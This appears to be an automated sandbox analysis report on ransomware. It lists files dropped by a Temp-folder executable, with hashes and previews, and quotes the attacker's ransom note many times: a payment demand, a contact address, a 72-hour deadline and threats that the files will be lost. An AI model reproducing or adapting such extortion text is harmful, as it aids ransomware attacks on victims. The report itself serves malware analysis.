                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1284
                                                                                            Entropy (8bit):7.838203336390938
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:XN7LMMquuvt1xE/f4w3I1UMju1Gl2vhOs27Iwt/CpGbZEF6sf5ZIcQG2YMFDYOJu:93MLhQ/TqpSk2ZFn03K9f2p0
                                                                                            MD5:B79644C595C786063C2512E3A35F3777
                                                                                            SHA1:1BE5E77E19CF3FB7834CCAE938BA73703D423D92
                                                                                            SHA-256:506D190AF44D9B2F8DEFAA4710ADED48C5E214EFE1F01A4563B8063FF4140DAB
                                                                                            SHA-512:73EA930BB5C3F41F3AE07FAB3CDA1B61628F1E11D5C665B2190CE50EA2609E14B08C91194557784B36EE3459BB3F16E5D402294306277ADAAFCB2BFE4DEA5E2D
                                                                                            Malicious:false
                                                                                            Preview:\h.!......{.....R.:,K.@..>.Z..y.K...V%..)Z#x.....XZ..Y_...@.d..[r.v......'2IZ..u"0b.a...|.A;g......ED.>F..u.......I.2...X1.q....`...._..V..P..4.W...f.ur=}.I..G.\L..S...N!.Ld^.%x...Z..i..?....3 uv.}....T..S..h'.j.~....!.?.&.5.L).K..ck..R..%T.4.M....w....-..@..U.M......<...8...Q.@v=...w....s!;..6...b..Jj.I.8w.NS.L...>!L.....Nw>X..1..r.m....W...........*....W...T.ca.....KB.j.)&..5.D...!......y.o......>..IB..(.m.....Kd.a.F:........&'..cyC.mW..{.r...........6uz0.p/.V..t.@e..=........$8.:..'{r|.;b...+..^..X....h..32Rn..=..=.....->.....FUR.G.'..u. ...9.z...mC.0.....4J.7......Z0...g...{.Q...2.X..(.}.b.L\.6?..m.......5.(.(0.eH.oz...s!m....3.=.D!..(T.J..N.p...q.......l.....".=+....5.......).u..79w..V.D.MM..Z.G...........W ...iF..XJw...:.%....K..d.I..d"..>.VJ.IV..c...Z....Y....44...k....TE...........9.!........i.K5z.j....t....3...jHV.j5TwU...nC.s..;z.~..L/'Z..8=..-...+.0NMs.&G9..J..q......Q.M....Zgz1...]&...r:>..8.K........f.Jyg.ls2.\U..=..?..rJ7..e9H*......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2373
                                                                                            Entropy (8bit):7.917852453348733
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:EnkV62KaVQM9zTUczj99JnazSJUEzUV14nCoBblSzqZPVZm3Dep8t7:WHX83UEjRnazSJUEzUve2u5VZCo8F
                                                                                            MD5:94E63E3890AD3866CE7FCA18E1628E79
                                                                                            SHA1:8509139CC3DC4A45F3D296D926DBC2F19AFEC15B
                                                                                            SHA-256:63508C8DEB7D1ACF8F70A71339382A0FCBC5E0587B1573EE3CADAEE72D73AFD8
                                                                                            SHA-512:9460D3ED32415FB8AF09C5064297946F90D9B98B84442A89169DDCADD0B33534B55C6DB661052920D5B8778A0CC13E6BABDE675EE0814C1F7CAE0D8E327DD12D
                                                                                            Malicious:false
                                                                                            Preview:.fo.VHN=......... h.2h.B..T;...EC....@.y.D%d[*.:.WOT....-.fs... ...c........n".....?,..A.U>."t.9'....%........."..I.J.Y.y.2..Q....c...:.<..P ...&._.v.><. b...c.(=.cxo..3.2g.#..3>......d.W.....c.Y`......Y,)T....c>{a.3S8...<7.F...+|..s.).|5w....kL^....P ........hQ..&.H>K...h.Q...w.B...>.k..W@?m ..++...3.V..t...+...X^.&|...6ie....G.h..A..D......rl. .S.H..)..7.X:^.6t..$1"Ba...9...t..Xa1.....k....:.h6.....d.(..;H....y.>.d..7.U..K..p<.....J{.....vIVC.....XHz......%q..x.E..(.L3c....C.`.Qq@.I....6'.|.-4M.q...".r..^.s.[..Bv.m,............O5S..^j!....*l@...E*.+..U...Ql.VFp.<f/..,^.....m...j.M.. {Xl.......'.z.3.....'../P....Ay..~..z.<D.w.~.6....)=Y.(.N.5.hL.....'v9.A....0.Am.....4..6.i..n.....3.../t......n..i..IV..9D. .t'..}/.(.._....s~.:P+a.bMrmo......9\>.j/..n..C...!y...U.5.S.... .~.p.....5....i........4..+C..)}..r....F..?.z.5...$!n%r&.*...c.....v.}(.e.8H.........lk.../..W...@....v.q3...`..V........'h..0..F,.v.8t...|S.(=g..../AZ...\.YiO....N`..T.sX.K.....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2330
                                                                                            Entropy (8bit):7.920855568346408
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MfaQ51c0rskBMryQl+KTCWl6V2i3A0BOhmRnHlYl0LgdaJzpQ/J2:i1cZkBQlM2i3AUOERO8g4hO2
                                                                                            MD5:1DCA5FAECC4484BCBAFF3E332C0798A3
                                                                                            SHA1:7CF3AE73FFC4EB4AE71552083248CAEAB2D76965
                                                                                            SHA-256:D946CC9830A0C555C3B44BAB4158B0BD7164D434BC7C18E9C930424C0B3F46A3
                                                                                            SHA-512:7B12B6314CA27E8A8CEF0D5A0ED6C81D2481D09BDBEB5A91E51931D9403AB83E6B419A87F8C3B969253D4C19304B94AB4927FBF40C06505DB03A3091E6A3787E
                                                                                            Malicious:false
                                                                                            Preview:...K..u......!.........-...j....J.h=i.dt....Vy0..H.>X5...P..{.J..P........I...j....?.$.+......l( .&... D........)......9....$..[.5%W....d....N.....`7..XZ|..c.-..m.{.).......q4.%...9.. ZF.}..=]2?.....f..........u?>X.9D..bOQbjd. `yOWJpe.W>.[....;.o..d....M..M....E."q7.:..a.x9 .V....S?.j.....G|.....I...s.yP.....7.lQ.......K;.=T/.^... .@.7!..........t...{s...w.k<.s.F.Aac....w@V..jU..2..W.._..|..O.mX.........X.......r4mg.`..!+7.....}d4.t..1\.0L..CI..2|..& Qian.U.X..[..*...u...... ..c.>m.\2..3.....].^..6.O~n.Q....b.5.......E....&1&..S.i...oF.De.E..1TL.]...|.w.9A."..h-[..!{.J.9..v.,..l....B.T.!B......./.. ..l&....U........;....+$~w.Z....[....`...<e.V...CJ.x...1,.v..A....BNR.G.2O..`I.=..7%!......E4.>i^F.....6....0.|...Z[..>-)_.w.9.r.o.wA........?.l...M.Q.......C..;......9.l."N..v........R....~V.L.+[.........lS..mx.7G?Sr..Y..\>m.....f.t~...}..t.:.+#<9g...5A;...h..l.,K......5j^.Rr.gK.oS.g..V.S.)......V.lVgr.l...&.v...y.f......k..y.Z.B.p-h.;F.[.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2348
                                                                                            Entropy (8bit):7.93313173722879
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:5YAGB3B2/oHBUZCQAXWGZnjTNJVP3549l5zVWwitm6pXmovkfYcPh:GL14oDNZn3rVP35Onzo1mvAc5
                                                                                            MD5:24EBD76FCB4809137AA4348B0BA88370
                                                                                            SHA1:938226C796198439C5629BE27AC87721A7E6DF71
                                                                                            SHA-256:7A025364B197B616A30BB960F97A9EE24483E53301C90BC01E56FB4A4A9AD133
                                                                                            SHA-512:75E31674AE7258B9744193F57DA239431518C309ED681F79C6CC9E7F4BEB9A660FF37EDEBC9B96F9DCF803B1E6F48C7CE947B78E581C12C8EA2A4E379CA13E96
                                                                                            Malicious:false
                                                                                            Preview:i&.;..J.w...M......{.d..>$H......?..5;pgw.$..m^..J2!...U..-..Na.y;.WO..M.;.1.e.j.9.. G.J....zvv...@...\;.?..|xA..4..2.pC%..2....L..jf-.....`w.9....Meu."Q.2.k...i..1...-....M!3jPR....d.(3....u..x...i..vzb..rA....%..*0.>K.v8.`...*...)ILO`.n..}...CB...#.........'.l...&......h......E.%...TB.t.C.+>..."....].......y3...$+.Os.r.[..~=.wh....Kvx.BH.c3.5...7..."X.p(,9!9../.HU.j.R\.e.K.T...T.@.$j.*.Y.......EkL*..dX?..R/=.P....fa&.:\)S..[c>Ux.n%..q=....$F.w.6..CE...;..q]..L...=...:Z.f.....:(Q../...<..5.w......l...B...).@kQ..wi..`..BO.....h;...<...a.sL.....*'.i.tr..?..|.si.....jX.....+.D.h$ovYs.O........[...2|.*.Q J6$..Q.......F8..F./ygHN.J)1....@.....5..P....>.>1..K...n.T.....Yr.~I...|.Z.s..TE.l.....E...W.K...R....Z..pVo..TM%.~F.3ofRbn>.............M.|..6......r`.K ........^.Z.KY./A.L.4.F....G..R.m7^N.....u...,eG...........[......!B..".CZ...#...m.7.~.........A<."..e...V7.)g.:.N...r...38...l.a.(.....T.c.!.N.....$..6......Gal.>.+..:.XK...=...k..j.....Hg<..xr.lCR..f^
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1290
                                                                                            Entropy (8bit):7.848084291599945
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MeMB+vZB3KJhzdEBzjQzdehLRQ9nJU3lFAcgm7017t:MegmZB3KJhzdEBYtnJU0RMu
                                                                                            MD5:CDE7EF343600A83D2DAB8D3C9DEED5F4
                                                                                            SHA1:554E161333110EF8794498D9C523CA58B3B9AD59
                                                                                            SHA-256:4CBAF968A5C53138861F346A0794DDCF9C9CA32333000F9D97E2256CD10D3C16
                                                                                            SHA-512:498DB19E174B5B0962F1D2369F64F781561EAC7D89E0CDF735E7BFB84FD68A2977428630DB13F1CCDCDE1AEEF2F5F61392B949966201475E14978975EBACF535
                                                                                            Malicious:false
                                                                                            Preview:..i.`.!........4.r..}..@..}k.I.Qc.]..:..5.[.-...........hvz......~.u.&.....*(.x.._FK-.Y.@."t%.H....&2.H. dR....i...(m...E..|Y..../=8...Vx"..W^.g.g....~..8.]w....X...&d...6..*S....I.JD...v..%.T.."W.2.......]&.9/.....w.N... .+_+..............oc<".fy.M?+.Q....N...--.>-.tx.eB..v.Z..)Uq...%.lS..X^....?*...T_..F\I..../..*..@...../.......B..`..`.}/.%.B...pL.].P.I..!Un.cw.2..t|......*/..].!..t....2.....7k.9.d....l.FQc.h...&....D.].uj.......-.....W].q..3M....mJ.V.@..p.3..C.....|........,.@..^.........&..m.p../.IP.......0..M.......ZF+..),.1........<.:._t...Dq..\..C...u.....X...A..L....Q..bi..I.]7.O..(..~m..n........Q..%U........q..f ....z+3....f.......k...tJK....aH......fgJ..e.X8.vk:T=.5.....1......o...x.....'_[h....zVG..].x.o..]J... ..l..k...Z........!....?.q..|#.'..h.}..F..;.25.*-.M[n..T......~....n5(C..HU..k.(Ft..C.;.C..%...Z...6...'.EP.=VO..7.}.....4.R*6..l.Z....6..!z...u..M..H......D..f....p... .0qf..W.?....=1*...%..[cu.f...K%.J.9.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2358
                                                                                            Entropy (8bit):7.911910365003099
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:hOg1JjNwBKIfYGvaXo/U9moU9pNIcdBcULjgEAqm:YWdIfNlf9bIcjc6eqm
                                                                                            MD5:97E559216DEE53BCCAC50A9509F77CE7
                                                                                            SHA1:5067E5ED1117A2818DC11E89152FF138DF0F4FD2
                                                                                            SHA-256:AF549EA46AE5088F6F1C3420CAD34A3AA546FB95C340D8D2B5AC8A9F12D863A4
                                                                                            SHA-512:C40DAEACCEF7D15A55AF98AEAF9F1F324E1448E9B2FBB79814EB1FEC2500DA9C4A7A096120552D15502DB4927579559D2007A7C6970A87AD2239097BE40DEF9A
                                                                                            Malicious:false
                                                                                            Preview:.y7V.6k$.o..RP.X.....c...t..a.....k~>....b.}............5.^`.o.n...X...f..?....d...H../V.+#xOR./ .~...A.u6..X8...~p...OC..)..`..,...f...6.._|.M....AN.>..G. .......oO....,2.{w....=.d.}BXG......RkC....*.,.?..x".`..._..h..:5.Y.v.~%...6C-.{...z../p.f!..49...-+.J.'f`....h_.F~.>C.>=..7......y...b^.....v.qC61'XO..!........A..?..7...>...A...9il.*...>a...$.I.S..m.r..H.5.........Q.>&9...g..+$..>...j...i........5>^W9.'.r..$w.2q.'..%T.._.h(.}.... (...k....f..I+..iZ.....!.Y.1....0.ST3.[.C.k..|...3-N.s`..T.yx*...w.0.h.b....m....Y9/....J.B3..C/.[1.(.Q...x....6.(q..."....$G.`....U...sF.2^.*..&.Y.B.....l4.VD.t.]..l..y..D^..[)\?.VX.N..........)..X...g..a:......u..]...:..s.n"....h..o@...=.m.C......SF......{y....G.M.`.UA5........:..o. .....>Q..Id.kL`.m#.....N..j..o*RT.....s.......*..D<.z...-HLR.8d0....G.bP.....l.............;.....W8@.a...y.u.xH...D...P.|....x...s..r.c......^)..|.)U..A^."..&."....q.v..8.(..........`!.&5Gnhf&.IL...r...\.o~L........~+.p..i.....T.x.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
